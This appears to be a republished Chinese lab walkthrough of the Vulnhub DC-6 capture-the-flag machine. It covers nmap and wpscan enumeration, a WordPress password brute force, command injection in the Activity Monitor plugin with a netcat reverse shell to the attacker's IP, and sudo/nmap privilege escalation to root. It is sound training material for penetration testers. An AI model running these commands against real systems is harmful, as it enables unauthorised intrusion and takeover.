Vulnhub-DC6靶机渗透

admin 2025年5月30日12:14:04评论5 views字数 2556阅读8分31秒阅读模式
鼎新安全
don't give up and don't give in !
目录

  • 环境搭建
  • 渗透测试
环境搭建

  1. 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。
渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机
┌──(root💀kali)-[~/桌面]└─# nmap -sP 192.168.10.0/24

Vulnhub-DC6靶机渗透

经判断,目标主机IP地址为192.168.10.151。
扫描开放的服务。

┌──(root💀kali)-[~/桌面]└─# nmap -sS 192.168.10.151

Vulnhub-DC6靶机渗透

扫描软件版本
┌──(root💀kali)-[~/桌面]└─# nmap -sV -p 22,80 192.168.10.151

Vulnhub-DC6靶机渗透

直接访问web服务,访问不到,需要添加hosts记录
┌──(root💀kali)-[~/桌面]└─# vim /etc/hosts192.168.10.151 wordy

Vulnhub-DC6靶机渗透

┌──(root💀kali)-[~/桌面]└─# whatwebhttp://192.168.10.151

Vulnhub-DC6靶机渗透

打开网站,并没有特别的地方。
网站为WordPress。

扫一下网站目录,也没有特别的目录。

Vulnhub-DC6靶机渗透

换用dirb扫一下网站目录
┌──(root💀kali)-[~/桌面]└─# dirb http://wordy/

Vulnhub-DC6靶机渗透

访问wp-admin,访问之后,出现了登录页。那么这里的思路就是使用暴力破解或者是SQL注入。
┌──(root💀kali)-[~/桌面]└─# wpscan --url http://wordy/ -e  // -e 枚举
使用wordpress 的扫描工具wpscan扫一下

Vulnhub-DC6靶机渗透

┌──(root💀kali)-[~/桌面]└─# wpscan --url http://wordy/ -e  // -e 枚举
admingrahamsarahmarkjens
以此来创建一个用户名字典
┌──(root💀kali)-[~/桌面]└─# vim wordy_user.txt
准备一个字典
┌──(root💀kali)-[~/桌面]└─# gzip -dk /usr/share/wordlists/rockyou.txt.gz┌──(root💀kali)-[~/桌面]└─# ls /usr/share/wordlists/rockyou.txt   /usr/share/wordlists/rockyou.txt
使用wpscan对目标进行暴力破解
┌──(root💀kali)-[~/桌面]└─# wpscan --url http://wordy/ -U wordy_user.txt -P /usr/share/wordlists/rockyou.txt
密码太多了,跑了3分多钟,才跑了0.01%

Vulnhub-DC6靶机渗透

去DC-6的网站看看有什么提示线索。果然这里给出了线索,简化一下密码字典。

Vulnhub-DC6靶机渗透

简化之后,重新跑一下吧~
┌──(root💀kali)-[~/桌面]└─# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt┌──(root💀kali)-[~/桌面]└─# wpscan --url http://wordy/ -U wordy_user.txt -P passwords.txt --max-threads 100
Vulnhub-DC6靶机渗透
顺利跑出一个用户名和密码

Vulnhub-DC6靶机渗透

用户名:mark

密码:helpdesk01

登录一下后台~

Vulnhub-DC6靶机渗透

发现安装了Activity Monitor插件

Vulnhub-DC6靶机渗透

经测试,这里可以进行远程代码执行。

Vulnhub-DC6靶机渗透

输出的结果

Vulnhub-DC6靶机渗透

既然可以正常执行系统命令,那尝试一下反弹shell。

kali开启监听

wp执行以下命令,但是网页输入框有长度限制,需要修改一下前端代码~
127.0.0.1 | nc 192.168.10.146 4444 -e /bin/bash
成功反弹shell

Vulnhub-DC6靶机渗透

先获得一个交互shell

Vulnhub-DC6靶机渗透

貌似还有另外一个方式:在msf中搜索一下该activity monitor插件相关利用脚本
msf6 > search activity monitor

Vulnhub-DC6靶机渗透

然后我们就可以进行一系列操作,比如看/etc/passwd或者是/home下的敏感信息,然后在/home/mark发现了敏感信息,如下图,似乎是grahm的密码GSo7isUM1D4。

Vulnhub-DC6靶机渗透

切换用户成功

Vulnhub-DC6靶机渗透

当然,也在jens家目录下发现一个.sh文件,

Vulnhub-DC6靶机渗透

并且全显示都可以执行。

Vulnhub-DC6靶机渗透

查看一下grahm用户的sudo授权,发现可以无密码以jens用户来执行backup.sh文件。

Vulnhub-DC6靶机渗透

查看一下grahm所属的组,发现在devs组,也就是说,可以往backups.sh中写内容(该文件对devs组有w权限)。

Vulnhub-DC6靶机渗透

向该文件中写入“/bin/bash”,然后使用sudo -u jens以jens用户运行该脚本,成功登录到jens。
graham@dc-6:~$ echo"/bin/bash" > /home/jens/backups.shgraham@dc-6:~$ sudo -u jens /home/jens/backups.shjens@dc-6:/home/graham$

Vulnhub-DC6靶机渗透

通过sudo -l 查看jens的授权

Vulnhub-DC6靶机渗透

发现可以以root身份执行nmap命令。

所以可以使用nmap来提权。

jens@dc-6:/home/graham$cd~jens@dc-6:~$echo"os.execute('/bin/bash')">shelljens@dc-6:~$sudonmap--script=shell

Vulnhub-DC6靶机渗透

成功提权到root。

成功拿到flag:

Vulnhub-DC6靶机渗透

🔗Reference:DC-6

  • https://zhuanlan.zhihu.com/p/534321293
  • https://blog.csdn.net/qq_38612882/article/details/122648462
  • https://blog.csdn.net/kengkeng123qwe/article/details/124869038
Vulnhub-DC6靶机渗透
END
Vulnhub-DC6靶机渗透
注:鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(鼎新安全):Vulnhub-DC6靶机渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月30日12:14:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-DC6靶机渗透http://cn-sec.com/archives/3945544.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息